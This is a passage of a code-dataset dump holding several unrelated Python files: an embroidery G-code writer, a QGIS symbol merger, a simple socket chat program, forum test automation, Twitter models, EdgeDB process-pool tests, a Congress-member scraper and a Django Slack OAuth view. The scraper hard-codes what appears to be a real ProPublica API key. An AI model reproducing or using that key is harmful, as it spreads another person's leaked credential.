self.train_ins.done(err_msg=err_msg)\n\n def signal_handler(self, signum, stack):\n logger.info(\"received signal: %s, do clean_up\", signum)\n self.clean_up()\n sys.exit()\n\nif __name__ == \"__main__\":\n worker = MXNetTrainingWorker()\n worker.start_new_training()\n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":11586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198297181","text":"#!/env/python\n#\n# merge-symbols: merge geologic symbols into a single library. \n#\n# (c) 2019 Alessandro Frigeri, Istituto di Astrofisica e Planetologia Spaziali - INAF - Rome\n#\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import Element, SubElement, Comment, ElementTree\nimport os,sys\nfrom xml.dom import minidom\nimport glob\n\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n j = \"\\n\" + (level-1)*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for subelem in elem:\n indent(subelem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = j\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = j\n return elem\n\n\nsrcdir = sys.argv[1]\ndst = sys.argv[2] \n\ntop = ET.Element('qgis_style', version=\"1\")\ncomment = ET.Comment('geologic symbols for QGis')\ntop.append(comment)\n\nsymbols = ET.SubElement(top, 'symbols')\n\nfor rootdir, dirs, files in os.walk( srcdir ): \n for filename in files:\n if filename.endswith(\".xml\"): \n xmlfile = os.path.join(rootdir, filename)\n auth = os.path.dirname( xmlfile ).split('/')[-1]\n tree = ET.parse( xmlfile )\n root = tree.getroot()\n for symbol in root.findall(\"./symbols/symbol\"): \n symbol.attrib['tags'] = auth+',geology'\n symbols.append(symbol) \n\nElementTree(indent(top)).write(dst)\n\n","sub_path":"qgis/3.4/src/scripts/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"367858923","text":"import socket, sys, select, argparse, signal\n\n\"\"\"\nthis function exits the program\n\"\"\"\ndef exit_program():\n\tlisten_socket.close()\n\texit(0)\n\n\"\"\"\nthis function handles CTRL+C\n\"\"\"\ndef sigint_handler(signum, frame):\n\texit_program()\n\nsignal.signal(signal.SIGINT, sigint_handler)\n\nparser = argparse.ArgumentParser()\n# list of possible arguments\nparser.add_argument(\"-s\", dest=\"wait\", action=\"store_true\", default=False)\nparser.add_argument(\"-p\", dest=\"port\")\nparser.add_argument(\"-c\", dest=\"hostname\")\n# collect all the arguments from the parser\nargs = parser.parse_args()\n\nlisten_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nif args.wait is True:\n\tlisten_socket.bind(('', int(args.port)))\n\tlisten_socket.listen(1)\nelse:\n\tlisten_socket.connect((args.hostname, int(args.port)))\n\nconnected_clients = []\nconnected_client = None\nis_connected = False\n\nwhile True:\n\tread_list = [sys.stdin, listen_socket] + connected_clients\n\t(ready_list, _, _) = select.select(read_list, [], [])\n\n\tfor ready in ready_list:\n\t\tif ready is listen_socket and args.wait is True:\n\t\t\tif is_connected is True:\n\t\t\t\tdata = ready.recv(1024)\n\t\t\t\tif len(data) == 0:\n\t\t\t\t\texit_program()\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write(\"%s\\n\" % data.rstrip())\n\t\t\telse:\n\t\t\t\tconnected_client, addr = ready.accept()\n\t\t\t\tconnected_clients.append(connected_client)\n\t\t\tis_connected = True\n\t\telif ready is sys.stdin:\n\t\t\tmessage = raw_input()\n\t\t\tif args.wait is True:\n\t\t\t\tconnected_client.send(message)\n\t\t\telse:\n\t\t\t\tlisten_socket.send(message)\n\t\telse:\n\t\t\tdata = ready.recv(1024)\n\t\t\tif len(data) == 0:\n\t\t\t\texit_program()\n\t\t\telse:\n\t\t\t\tsys.stdout.write(\"%s\\n\" % data.rstrip())","sub_path":"hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"382920411","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom pageobject.base import BasePage\nimport time\n\nclass Login_AdminUsername2(BasePage):\n # 管理员用户登录\n # 进入默认板块\n # 选择要删除的帖子,并单击删除\n def del_message_page(self):\n sel_del_message=(By.CSS_SELECTOR,'form table tbody tr .o input')\n del_message = (By.CSS_SELECTOR, 'form div p strong a')\n confirm_button=(By.CSS_SELECTOR, '.o .pn span')\n time.sleep(2)\n self.change_window()\n self.click(*sel_del_message)\n time.sleep(2)\n self.click(*del_message)\n time.sleep(2)\n self.click(*confirm_button)\n # 进入版块管理(管理中心 - -论坛)\n adminpage = (By.LINK_TEXT, '管理中心')\n self.click(*adminpage)\n def admin_page(self):\n # psw_page=(By.CSS_SELECTOR,'.loginform .txt') # 重新登录\n # admin_submit=(By.CSS_SELECTOR,'.loginnofloat .btn')\n click_discuz = (By.ID, 'header_forum') # 进入论坛\n\n self.change_window()\n time.sleep(5)\n # self.clear(*psw_page)\n # self.sendkeys(cx_psw,*psw_page) # 重新登录\n # time.sleep(2)\n # self.click( *admin_submit)\n time.sleep(10)\n self.change_window()\n self.click(*click_discuz)\n # 创建新的版块\n def new_block_page(self,newblock):\n new_block=(By.CSS_SELECTOR,'.lastboard .addtr') #添加新板块\n new_block_name=(By.NAME,'newforum[1][]') #创建新的板块\n new_block_submit=(By.CSS_SELECTOR,'.fixsel .btn') #提交\n time.sleep(5)\n self.change_window()\n self.enter_iframe()\n self.click(*new_block)\n time.sleep(5)\n time.sleep(2)\n self.clear(*new_block_name)\n self.sendkeys(newblock, *new_block_name)\n self.click(*new_block_submit)\n close_new_page = (By.CSS_SELECTOR, '.uinfo a') # 关闭新的页面\n time.sleep(5)\n self.change_window()\n self.click(*close_new_page)\n # 管理员退出\n # 普通用户登录\n # 在新的版块下发帖\n def new_block_message(self):\n new_block = (By.CSS_SELECTOR, '.fl_tb tr:nth-last-child(2) td h2 a')\n time.sleep(2)\n self.click(*new_block)\n # 发帖\n # 回复帖子","sub_path":"baidu01/pageobject/discuz2_page.py","file_name":"discuz2_page.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"594492509","text":"try:\n\timport webcolors\nexcept ImportError:\n\tprint('''Module \"webcolors\" not found. \nThis module enables better thread color names.\nInstall with \npython -m pip install webcolors''')\n\n\n\tclass webcolors:\n\t\t@staticmethod\n\t\tdef hex_to_name(name):\n\t\t\treturn name\n\nfrom .EmbConstant import *\nfrom .WriteHelper import write_string_utf8\n\nSTRIP_SPEEDS = True\nSEQUIN_CONTINGENCY = CONTINGENCY_SEQUIN_STITCH\nMAX_JUMP_DISTANCE = float('inf')\nMAX_STITCH_DISTANCE = float('inf')\n\n\ndef write(pattern, f, settings=None):\n\tif settings is None:\n\t\tsettings = {}\n\n\tflip_x = settings.get('flip_x', False)\n\tflip_y = settings.get('flip_y', True)\n\tstitch_z_travel = settings.get('stitch_z_travel', 3.6)\n\tstitch_z_thread_free = settings.get('stitch_z_thread_free', 0.1)\n\tis_drilling = settings.get('drilling_cycle', False)\n\tfeed_rate = settings.get('feed_rate', -1)\n\n\tstitch_z_travel -= stitch_z_thread_free\n\tif stitch_z_travel < 0:\n\t\tstitch_z_travel = 0\n\n\t# pyembroidery natively uses tenths of a millimeter\n\textents = [extent / 10.0 for extent in pattern.extents()]\n\twidth = extents[2] - extents[0]\n\theight = extents[3] - extents[1]\n\n\theader_block(f, feed_rate, pattern.count_stitches())\n\n\tz = 0\n\tstitching = False\n\tthread_id = -1\n\tthread_list = pattern.threadlist\n\tnum_col_changes = 0\n\tfor x, y, command in pattern.stitches:\n\t\tif command == COLOR_CHANGE:\n\t\t\tnum_col_changes += 1\n\n\tfor x, y, command in pattern.stitches:\n\t\t# embroidery G-code discussion: https://github.com/inkstitch/inkstitch/issues/335\n\t\tif x is not None:\n\t\t\tif flip_x:\n\t\t\t\tx = -x\n\t\t\t# pyembroidery natively uses tenths of a millimeter\n\t\t\tx /= 10.0\n\t\tif y is not None:\n\t\t\tif flip_y:\n\t\t\t\ty = -y\n\t\t\t# pyembroidery natively uses tenths of a millimeter\n\t\t\ty /= 10.0\n\n\t\tif command == COLOR_CHANGE:\n\t\t\tif thread_id < 0:\n\t\t\t\tthread_id = 0\n\t\t\tswitch_thread(f, thread_id, thread_list)\n\t\t\tthread_id += 1\n\n\t\tif command == JUMP:\n\t\t\tif thread_id < 0:\n\t\t\t\tthread_id = 0 if num_col_changes < len(thread_list) else -1\n\t\t\t\tswitch_thread(f, thread_id, thread_list)\n\t\t\t\tthread_id += 1\n\t\t\twrite_string_utf8(f, \"G0 X%.3f Y%.3f\\r\\n\" % (x, y))\n\n\t\tif command == STITCH:\n\t\t\tif thread_id < 0:\n\t\t\t\tthread_id = 0 if num_col_changes < len(thread_list) else -1\n\t\t\t\tswitch_thread(f, thread_id, thread_list)\n\t\t\t\tthread_id += 1\n\t\t\tif is_drilling:\n\t\t\t\twrite_string_utf8(f, \"G80 X%.3f Y%.3f Z%.3f R%.3f (stitch cycle)\\r\\n\" % (x, y, stitch_z_travel, stitch_z_thread_free))\n\t\t\telse:\n\t\t\t\tzcmd = ''\n\t\t\t\tif stitch_z_thread_free > 0:\n\t\t\t\t\tz += stitch_z_thread_free\n\t\t\t\t\tzcmd = \" Z%.3f\" % z\n\t\t\t\twrite_string_utf8(f, \"G1 X%.3f Y%.3f%s\\r\\n\" % (x, y, zcmd))\n\t\t\t\tif stitch_z_travel > 0:\n\t\t\t\t\tz += stitch_z_travel\n\t\t\t\t\twrite_string_utf8(f, \"G1 Z%.1f\\r\\n\" % z)\n\tfooter_block(f)\n\n\ndef footer_block(f):\n\twrite_string_utf8(f, \"(Block-name: Footer)\\r\\n\");\n\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\");\n\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\");\n\twrite_string_utf8(f, \"G0 X0.0 Y0.0 (Go to origin)\\r\\n\")\n\twrite_string_utf8(f, \"M18 (Disable all stepper motors)\\r\\n\")\n\twrite_string_utf8(f, \"M30 (End of program)\\r\\n\")\n\n\ndef header_block(f, feed_rate=-1, num_stitches=-1):\n\twrite_string_utf8(f, \"(Block-name: Header)\\r\\n\")\n\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\")\n\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\")\n\tif num_stitches > 0:\n\t\twrite_string_utf8(f, '(STITCH_COUNT:%d)\\r\\n' % num_stitches)\n\twrite_string_utf8(f, '(EXTENTS_LEFT:[xmin])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_TOP:[ymin])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_RIGHT:[xmax])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_BOTTOM:[ymax])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_WIDTH:[xmax-xmin])\\r\\n')\n\twrite_string_utf8(f, '(EXTENTS_HEIGHT:[ymax-ymin])\\r\\n')\n\twrite_string_utf8(f, \"G90 (use absolute coordinates)\\r\\n\")\n\twrite_string_utf8(f, \"G21 (coordinates will be specified in millimeters)\\r\\n\")\n\twrite_string_utf8(f, \"G92 X0.0 Y0.0 Z0.0 (current position is the origin)\\r\\n\")\n\tif feed_rate > 0:\n\t\twrite_string_utf8(f, \"G1 X0.0 Y0.0 F%d\\r\\n\" % (feed_rate))\n\t\twrite_string_utf8(f, \"G0 X0.0 Y0.0 F%d\\r\\n\" % (feed_rate))\n\twrite_string_utf8(f, \"\\r\\n\")\n\n\ndef closest_colour(requested_colour):\n\trequested_colour = webcolors.hex_to_rgb(requested_colour)\n\tmin_colours = {}\n\tfor key, name in webcolors.css3_hex_to_names.items():\n\t\tr_c, g_c, b_c = webcolors.hex_to_rgb(key)\n\t\trd = (r_c - requested_colour[0]) ** 2\n\t\tgd = (g_c - requested_colour[1]) ** 2\n\t\tbd = (b_c - requested_colour[2]) ** 2\n\t\tmin_colours[(rd + gd + bd)] = name\n\treturn min_colours[min(min_colours.keys())]\n\n\ndef get_colour_name(requested_colour):\n\ttry:\n\t\tclosest_name = actual_name = webcolors.hex_to_name(requested_colour)\n\texcept ValueError:\n\t\tclosest_name = closest_colour(requested_colour)\n\t\tactual_name = None\n\treturn actual_name, closest_name\n\n\ndef dump_thread_data(f, selected_thread):\n\tthread_attrs = [a for a in dir(selected_thread) if not a.startswith('__') and not callable(getattr(selected_thread, a))]\n\tfor variable in thread_attrs:\n\t\tif variable.upper() == 'COLOR':\n\t\t\t_, thread_color = get_colour_name(selected_thread.hex_color())\n\t\t\tvarvalue = thread_color.title() + ' <' + selected_thread.hex_color() + '>'\n\t\telse:\n\t\t\tvarvalue = getattr(selected_thread, variable)\n\t\t\tif varvalue == 'None':\n\t\t\t\tvarvalue = None\n\t\tif varvalue:\n\t\t\treadable = variable.replace('_', ' ').capitalize().strip()\n\t\t\tif readable:\n\t\t\t\twrite_string_utf8(f, '(%s: %s)\\r\\n' % (readable, varvalue))\n\n\ndef switch_thread(f, thread_id, threads_list):\n\tif thread_id < 0:\n\t\tthread_id = len(threads_list)\n\tif len(threads_list) <= thread_id:\n\t\twrite_string_utf8(f, \"(Block-name: Default Thread)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\")\n\telse:\n\t\tselected_thread = threads_list[thread_id]\n\t\t_, thread_color = get_colour_name(selected_thread.hex_color())\n\t\tthread_desc = \", Color: %s\" % thread_color.title()\n\t\tif selected_thread.catalog_number == 'None':\n\t\t\tselected_thread.catalog_number = None\n\t\tthread_desc += (', Catalog number: %s' % selected_thread.catalog_number) if selected_thread.catalog_number else \"\"\n\t\twrite_string_utf8(f, \"(Block-name: Thread #%d%s)\\r\\n\" % (thread_id, thread_desc))\n\t\twrite_string_utf8(f, \"(Block-expand: 0)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-enable: 1)\\r\\n\")\n\t\twrite_string_utf8(f, \"(Block-color: %s)\\r\\n\" % selected_thread.hex_color())\n\t\tdump_thread_data(f, selected_thread)\n\t\twrite_string_utf8(f, \"%wait\\r\\n\")\n\t\tthread_catalog_id = (\",ID:%s\"%selected_thread.catalog_number) if selected_thread.catalog_number else \"\"\n\t\twrite_string_utf8(f, \"%%msg (Change%d)New color:%s%s\\r\\n\" % (thread_id, thread_color.title(),thread_catalog_id))\n\t\twrite_string_utf8(f, \"M0 (pause)\\r\\n\")\n","sub_path":"pyembroidery/GcodebCNCWriter.py","file_name":"GcodebCNCWriter.py","file_ext":"py","file_size_in_byte":6566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"334749419","text":"# -*- coding: utf-8 -*-\nfrom mongoengine import *\n\n\nclass User(Document):\n \"\"\"class representing a Twitter user\"\"\"\n name = StringField(max_length=100, required=True, db_field='name')\n screen_name = StringField(max_length=100, required=True, db_field='screen_name')\n location = StringField(max_length=100, db_field='location')\n followers_count = IntField(db_field='followers_count')\n friends_count = IntField(db_field='friends_count')\n created_at = DateTimeField(db_field='created_ad')\n statuses_count = IntField(db_field='statuses_count')\n profile_image_url = URLField(db_field='profile_image_url')\n description = StringField(db_field='description')\n lang = StringField(db_field='lang')\n tweets = ListField(EmbeddedDocumentField('Tweet'))\n\n meta = {'collection': 'users'}\n\n def __unicode__(self):\n return '%s (@%s)' % (self.name, self.screen_name)\n\n\nclass Entity(Document):\n \"\"\"class representing an entity of a tweet\"\"\"\n hashtags = ListField(EmbeddedDocumentField('Hashtag'))\n user_mentions = ListField(EmbeddedDocumentField('UserMention'))\n urls = ListField(EmbeddedDocumentField('URL'))\n\n\nclass Tweet(Document):\n \"\"\"Class representing a tweet made by a user\"\"\"\n created_at = DateTimeField(db_field='created_at')\n tweet_id = LongField(db_field='id')\n text = StringField(db_field='text')\n retweet_count = IntField(db_field='retweet_count')\n favorite_count = IntField(db_field='favorite_count')\n entities = EmbeddedDocumentField('Entity')\n\n\nclass Hashtag(Document):\n \"\"\"class representing a hashtag which is an entity\"\"\"\n text = StringField(db_field='text')\n indices = ListField(db_field='indices')\n\n\nclass UserMention(Document):\n \"\"\"class representing a user mention which is part of an entity\"\"\"\n screen_name = StringField(db_field='screen_name')\n name = StringField(db_field='name')\n mention_id = StringField(db_field='id_str')\n indices = ListField(db_field='indices')\n\n\nclass URL(Document):\n \"\"\"class representing which is part of an entity\"\"\"\n url = URLField(db_field='url')\n expanded_url = URLField(db_field='expanded_url')\n display_url = URLField(db_field='display_url')\n indices = ListField(db_field='indices')\n","sub_path":"public/SocialMediaAnalysis/SMAapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"614969437","text":"from PyQt5 import QtWidgets, uic\nimport sys\n\n#Variables\nglobal chosenApps\nchosenApps = []\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__()\n uic.loadUi('form.ui', self)\n self.setWindowTitle(\"Welcome to IXOS\")\n self.show()\n self.button = self.findChild(QtWidgets.QPushButton, 'b1')\n self.button.clicked.connect(self.printButtonPressed)\n\n def printButtonPressed(self):\n # This is executed when the button is pressed\n print('printButtonPressed')\n dialog = DialogUi()\n dialog.exec_()\n try:\n if acceptedTos:\n print(\"Continue to app selection\")\n self.close()\n dialog = AppDialogUi()\n dialog.exec_()\n except Exception as e:\n print(\"Error occured, showing error dialogue!\\n\",e)\n\n\nclass DialogUi(QtWidgets.QDialog):\n def __init__(self):\n super(DialogUi, self).__init__()\n uic.loadUi('dialog.ui', self)\n self.setWindowTitle(\"Accept TOS\")\n self.button = self.findChild(QtWidgets.QPushButton, 'accept')\n self.button.clicked.connect(self.acceptButtonPressed)\n self.button2 = self.findChild(QtWidgets.QPushButton, 'cancel')\n self.button2.clicked.connect(self.cancelButtonPressed)\n self.show()\n\n def acceptButtonPressed(self):\n # This is executed when the button is pressed\n print('acceptButtonPressed')\n global acceptedTos\n acceptedTos = True\n print(acceptedTos)\n self.close()\n\n def cancelButtonPressed(self):\n # This is executed when the button is pressed\n print('cancelButtonPressed')\n self.close()\n\nclass AppDialogUi(QtWidgets.QDialog):\n def __init__(self):\n super(AppDialogUi, self).__init__()\n uic.loadUi('appdialog.ui', self)\n self.setWindowTitle(\"Select Applications\")\n self.button = self.findChild(QtWidgets.QPushButton, 'continue_2')\n self.button.clicked.connect(self.continueButtonPressed)\n self.button2 = self.findChild(QtWidgets.QPushButton, 'cancel')\n self.button2.clicked.connect(self.cancelButtonPressed)\n self.show()\n\n def continueButtonPressed(self):\n # This is executed when the button is pressed\n print('continueButtonPressed')\n\n self.close()\n\n def cancelButtonPressed(self):\n # This is executed when the button is pressed\n print('cancelButtonPressed')\n self.close()\n\n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_()\n\n","sub_path":"greeter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"468895579","text":"#\n# This source file is part of the EdgeDB open source project.\n#\n# Copyright 2016-present MagicStack Inc. and the EdgeDB authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nimport asyncio\nimport os\nimport signal\nimport tempfile\n\nimport uvloop\n\nfrom edb.server import _testbase as tb\nfrom edb.server2 import procpool\nfrom edb.lang.common import taskgroup\n\n\nclass MyExc(Exception):\n pass\n\n\nclass Worker:\n\n def __init__(self, o):\n self._o = o\n self._i = 0\n\n async def test1(self, t):\n self._i += 1\n await asyncio.sleep(t)\n return self._i\n\n async def test2(self):\n return self._o\n\n async def test3(self):\n 1 / 0\n\n async def test4(self):\n e = MyExc()\n e.special = 'spam'\n raise e\n\n async def test5(self):\n class WillCrashPickle(Exception):\n pass\n raise WillCrashPickle\n\n\nclass TestProcPool(tb.TestCase):\n\n @classmethod\n def setUpClass(cls):\n asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())\n super().setUpClass()\n\n @classmethod\n def tearDownClass(cls):\n try:\n super().tearDownClass()\n finally:\n asyncio.set_event_loop_policy(None)\n\n def setUp(self):\n self._dir = tempfile.TemporaryDirectory()\n self.runstate_dir = self._dir.name\n\n def tearDown(self):\n self._dir.cleanup()\n self._dir = None\n\n async def test_procpool_1(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_1')\n\n try:\n i1 = asyncio.create_task(pool.call('test1', 0.1))\n i2 = asyncio.create_task(pool.call('test1', 0.05))\n\n i1 = await i1\n i2 = await i2\n\n self.assertEqual(i1, 1)\n self.assertEqual(i2, 2)\n finally:\n await pool.stop()\n\n async def test_procpool_2(self):\n pool = await procpool.create_pool(\n max_capacity=5,\n min_capacity=5,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_2')\n\n try:\n tasks = []\n for i in range(20):\n tasks.append(asyncio.create_task(pool.call('test1', 0.1)))\n\n await asyncio.gather(*tasks)\n finally:\n await pool.stop()\n\n results = [t.result() for t in tasks]\n self.assertEqual(results, [\n 1, 1, 1, 1, 1,\n 2, 2, 2, 2, 2,\n 3, 3, 3, 3, 3,\n 4, 4, 4, 4, 4\n ])\n\n async def test_procpool_3(self):\n pool = await procpool.create_pool(\n max_capacity=5,\n min_capacity=5,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_3')\n\n try:\n r = await pool.call('test2')\n finally:\n await pool.stop()\n\n self.assertEqual(r, [123])\n\n async def test_procpool_4(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_4')\n\n try:\n with self.assertRaises(ZeroDivisionError):\n await pool.call('test3')\n\n self.assertEqual(await pool.call('test1', 0.1), 1)\n\n with self.assertRaises(ZeroDivisionError):\n await pool.call('test3')\n\n self.assertEqual(await pool.call('test1', 0.1), 2)\n\n finally:\n await pool.stop()\n\n async def test_procpool_5(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_5')\n\n try:\n t1 = asyncio.create_task(pool.call('test3'))\n t2 = asyncio.create_task(pool.call('test1', 0.1))\n t3 = asyncio.create_task(pool.call('test3'))\n t4 = asyncio.create_task(pool.call('test1', 0.1))\n\n await asyncio.gather(t1, t2, t3, t4, return_exceptions=True)\n\n with self.assertRaises(ZeroDivisionError):\n await t1\n with self.assertRaises(ZeroDivisionError):\n await t3\n\n self.assertEqual(t2.result(), 1)\n self.assertEqual(t4.result(), 2)\n\n finally:\n await pool.stop()\n\n async def test_procpool_6(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_6')\n\n try:\n with self.assertRaises(MyExc) as e:\n await pool.call('test4')\n\n self.assertEqual(e.exception.special, 'spam')\n\n finally:\n await pool.stop()\n\n async def test_procpool_7(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_7')\n\n try:\n with self.assertRaisesRegex(RuntimeError, 'pickle local object'):\n await pool.call('test5')\n\n self.assertEqual(await pool.call('test1', 0.1), 1)\n\n finally:\n await pool.stop()\n\n async def test_procpool_8(self):\n pool = await procpool.create_pool(\n max_capacity=1,\n min_capacity=1,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_8')\n\n worker = next(pool.manager.iter_workers())\n pid = worker.get_pid()\n\n try:\n t = asyncio.create_task(pool.call('test1', 10))\n await asyncio.sleep(0.1)\n\n os.kill(pid, signal.SIGTERM)\n\n with self.assertRaisesRegex(ConnectionError,\n 'lost connection to the worker'):\n await t\n\n self.assertEqual(await pool.call('test1', 0.1), 1)\n\n finally:\n await pool.stop()\n\n async def test_procpool_9(self):\n pool = await procpool.create_pool(\n max_capacity=10,\n min_capacity=1,\n gc_interval=0.01,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_9')\n\n try:\n async with taskgroup.TaskGroup() as g:\n for _ in range(100):\n g.create_task(pool.call('test1', 0.1))\n\n await asyncio.sleep(1)\n await pool.call('test1', 0.1)\n\n finally:\n await pool.stop()\n\n async def test_procpool_10(self):\n pool = await procpool.create_pool(\n max_capacity=10,\n min_capacity=2,\n gc_interval=0.01,\n runstate_dir=self.runstate_dir,\n worker_cls=Worker,\n worker_args=([123],),\n name='test_procpool_10')\n\n manager = pool.manager\n\n try:\n async with taskgroup.TaskGroup() as g:\n for _ in range(100):\n g.create_task(pool.call('test1', 0.1))\n\n await asyncio.sleep(0.5)\n\n self.assertEqual(manager._stats_spawned, 10)\n self.assertEqual(manager._stats_killed, 8)\n\n w1 = await pool.acquire()\n w2 = await pool.acquire()\n w3 = await pool.acquire()\n\n await asyncio.sleep(0.5)\n\n self.assertEqual(manager._stats_spawned, 11)\n self.assertEqual(manager._stats_killed, 8)\n\n await w1.call('test1', 0.1)\n await w2.call('test1', 0.1)\n await w3.call('test1', 0.1)\n\n self.assertEqual(manager._stats_spawned, 11)\n self.assertEqual(manager._stats_killed, 8)\n\n finally:\n await pool.stop()\n\n self.assertEqual(manager._stats_spawned, 11)\n self.assertEqual(manager._stats_killed, 11)\n","sub_path":"tests/test_server_procpool.py","file_name":"test_server_procpool.py","file_ext":"py","file_size_in_byte":8933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"319246266","text":"import sys\nimport json\nimport urllib\nimport os.path\nimport requests\n\n\ndef getUnitedStatesCongress():\n url = 'https://api.propublica.org/congress/v1/'\n x_api_key = 'LDvokyM6kvfKBSNyq153Gk13UGfAuPxs7qtjekyv'\n current = 115\n headers = {\n 'X-API-Key': x_api_key\n }\n congress = {}\n chambers = ['house', 'senate']\n for chamber in chambers:\n chamberURL = url + str(current) + '/' + chamber + '/members.json'\n print(chamberURL)\n r = requests.get(url=chamberURL, headers=headers).json()\n status = r['status']\n if status == 'OK':\n results = r['results']\n result = results[0]\n if 'members' in result:\n members = result['members']\n index = 0\n total = len(members)\n for member in members:\n member_id = member['id']\n image_url = 'https://raw.githubusercontent.com/unitedstates/images/gh-pages/congress/original/' + member_id + '.jpg'\n members[index]['image'] = image_url\n image_path = './images/' + chamber + '/' + member_id + '.jpg'\n image_exist = os.path.exists(image_path)\n if not image_exist:\n urllib.urlretrieve(image_url, image_path)\n index += 1\n print(chamber.upper())\n progress(index, total)\n congress[chamber] = members\n with open('./json/' + chamber + '.json', 'w') as jsonfile:\n json.dump(members, jsonfile)\n with open('./json/congress.json', 'w') as jsonfile:\n json.dump(congress, jsonfile)\n\n\ndef progress(count, total, status=''):\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[%s] %s%s ...%s\\n\\r' % (bar, percents, '%', status))\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n getUnitedStatesCongress()\n","sub_path":"dist/assets/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"44304278","text":"from uuid import uuid4\n\nfrom django.conf import settings\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import DetailView\n\nfrom heatherr.models import SlackAccount\n\nimport requests\n\n\ndef login_view(request):\n return render(request, \"account/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n messages.success(request, 'You have been logged out. See you again soon!')\n return redirect(reverse('accounts:login'))\n\n\n@login_required\ndef profile(request):\n request.session['authorize_state'] = uuid4().hex\n request.session['authorize_request_uri'] = '%s://%s%s' % (\n ('https' if request.is_secure() else 'http'),\n get_current_site(request).domain,\n reverse('accounts:authorize'))\n if request.user.slackaccount_set.exists():\n return render(request, \"account/profile.html\")\n return render(request, \"account/new_profile.html\")\n\n\n@login_required\ndef authorize(request):\n if request.session['authorize_state'] != request.GET['state']:\n return render(request, \"account/authorize_fail.html\", {\n \"error\": \"Invalid state token.\",\n })\n\n response = requests.post('https://slack.com/api/oauth.access', data={\n 'client_id': settings.SLACK_CLIENT_ID,\n 'client_secret': settings.SLACK_CLIENT_SECRET,\n 'code': request.GET['code'],\n 'redirect_uri': request.session['authorize_request_uri'],\n 